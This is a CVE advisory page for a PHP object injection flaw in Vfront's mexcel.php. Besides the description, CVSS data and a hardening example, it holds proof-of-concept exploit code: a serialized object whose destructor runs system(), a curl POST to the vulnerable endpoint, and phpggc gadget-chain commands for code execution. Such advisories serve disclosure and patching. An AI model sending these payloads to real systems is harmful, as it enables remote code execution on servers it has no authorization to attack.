Security Vulnerability Report
CVE-2025-60641 CVSS 6.5 MEDIUM

CVE-2025-60641

Published: 2025-10-16 18:15:37
Last Modified: 2026-04-15 00:35:42

Description

The file mexcel.php in the Vfront 0.99.52 codebase contains a vulnerable call to unserialize(base64_decode($_POST['mexcel'])), where $_POST['mexcel'] is user-controlled input. This input is decoded from base64 and deserialized without validation or use of the allowed_classes option, allowing an attacker to inject arbitrary PHP objects. This can lead to malicious behavior, such as Remote Code Execution (RCE), SQL Injection, Path Traversal, or Denial of Service, depending on the availability of exploitable classes in the Vfront codebase or its dependencies.
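As an added example, not code from the Vfront project or from the advisory, here is the vulnerable call pattern from the description beside a hardened replacement for the same `mexcel` parameter. The function names and the assumption that mexcel.php only needs a flat array of export settings are mine.

```php
<?php
// Added hardening example, not Vfront's own code. Assumes (hypothetically) that
// mexcel.php only needs a flat array of export settings from the 'mexcel' field.

// Vulnerable pattern from the advisory: every class named in the stream is
// instantiated, so any gadget chain reachable from the codebase can fire.
function decode_mexcel_unsafe(string $raw) {
    return unserialize(base64_decode($raw));
}

// Hardened variant: strict base64, no object instantiation, bounded nesting,
// and a structural check before the value is used.
function decode_mexcel_safe(string $raw): array {
    $bin = base64_decode($raw, true);   // strict mode rejects non-base64 input
    if ($bin === false) {
        throw new InvalidArgumentException('mexcel is not valid base64');
    }
    $data = @unserialize($bin, [
        'allowed_classes' => false, // objects become __PHP_Incomplete_Class; no magic methods run
        'max_depth'       => 4,     // PHP >= 7.4: cap nesting to limit resource exhaustion
    ]);
    if (!is_array($data) || !is_scalar_tree($data)) {
        throw new InvalidArgumentException('mexcel must be an array of scalars');
    }
    return $data;
}

// Accept only scalars/null and arrays of them; any object, including an
// incomplete-class placeholder, fails the check.
function is_scalar_tree($value): bool {
    if (is_array($value)) {
        foreach ($value as $v) {
            if (!is_scalar_tree($v)) {
                return false;
            }
        }
        return true;
    }
    return is_scalar($value) || $value === null;
}

// Constructed inputs: a benign settings array, then a serialized object that
// stands in for any gadget class and is rejected before anything is instantiated.
$benign = base64_encode(serialize(['table' => 'orders', 'format' => 'xls']));
var_dump(decode_mexcel_safe($benign));
$objectStream = base64_encode('O:8:"stdClass":1:{s:1:"x";i:1;}');
try {
    decode_mexcel_safe($objectStream);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

Where the client side can be changed, switching the parameter to JSON and reading it with json_decode($raw, true) removes the class-instantiation surface entirely rather than just fencing it.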

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Vfront < 0.99.52
Vfront 0.99.52

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```php
<?php
/**
 * CVE-2025-60641 - Vfront 0.99.52 PHP Object Injection PoC
 * Vulnerability: Unsafe unserialize() in mexcel.php
 *
 * This PoC demonstrates how to craft a malicious serialized payload
 * that exploits the unsafe unserialize() call in mexcel.php.
 *
 * Usage:
 * 1. Generate payload: php poc.php
 * 2. Send the output as POST parameter 'mexcel' to mexcel.php
 */

// Example: Simple PHP Object Injection payload
// In a real scenario, you would use a gadget chain from
// the application's dependencies (e.g., Monolog, Guzzle, etc.)
class ExploitObject {
    public $command;

    public function __destruct() {
        // This will be triggered automatically during unserialization cleanup
        // In real exploitation, this would be replaced with a gadget chain
        // that leads to code execution
        if (isset($this->command)) {
            system($this->command);
        }
    }
}

// Step 1: Create the malicious object
$payload = new ExploitObject();
$payload->command = "id; whoami"; // Command to execute

// Step 2: Serialize the object
$serialized = serialize($payload);

// Step 3: Base64 encode the serialized data
$encoded = base64_encode($serialized);

echo "[*] CVE-2025-60641 PoC Payload\n";
echo "[*] Serialized: " . $serialized . "\n";
echo "[*] Base64 Encoded: " . $encoded . "\n";
echo "[*] Send as POST parameter 'mexcel' to the vulnerable mexcel.php\n";
echo "\n[*] Example curl command:\n";
echo "curl -X POST -d 'mexcel=" . $encoded . "' http://target/vfront/mexcel.php\n";

// Alternative: Using existing PHP gadget chains (e.g., from phpggc)
// phpggc -l monolog/rce1 -b -u "id"
// The output can be sent as the 'mexcel' parameter
?>
```

```php
<?php
/**
 * Alternative PoC using curl directly with a known gadget chain
 * Requires phpggc tool: https://github.com/ambionics/phpggc
 *
 * Generate payload:
 * phpggc monolog/rce1 system 'id' -b
 *
 * Then send:
 * curl -X POST --data-urlencode "mexcel=<BASE64_PAYLOAD>" http://target/mexcel.php
 */
?>
```

References

http://vfront.com
https://xancatos.org/cve202560641

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-60641",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-16T18:15:37.183",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The file mexcel.php in the Vfront 0.99.52 codebase contains a vulnerable call to unserialize(base64_decode($_POST['mexcel'])), where $_POST['mexcel'] is user-controlled input. This input is decoded from base64 and deserialized without validation or use of the allowed_classes option, allowing an attacker to inject arbitrary PHP objects. This can lead to malicious behavior, such as Remote Code Execution (RCE), SQL Injection, Path Traversal, or Denial of Service, depending on the availability of exploitable classes in the Vfront codebase or its dependencies."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-89" }
        ]
      }
    ],
    "references": [
      { "url": "http://vfront.com", "source": "[email protected]" },
      { "url": "https://xancatos.org/cve202560641", "source": "[email protected]" }
    ]
  }
}
```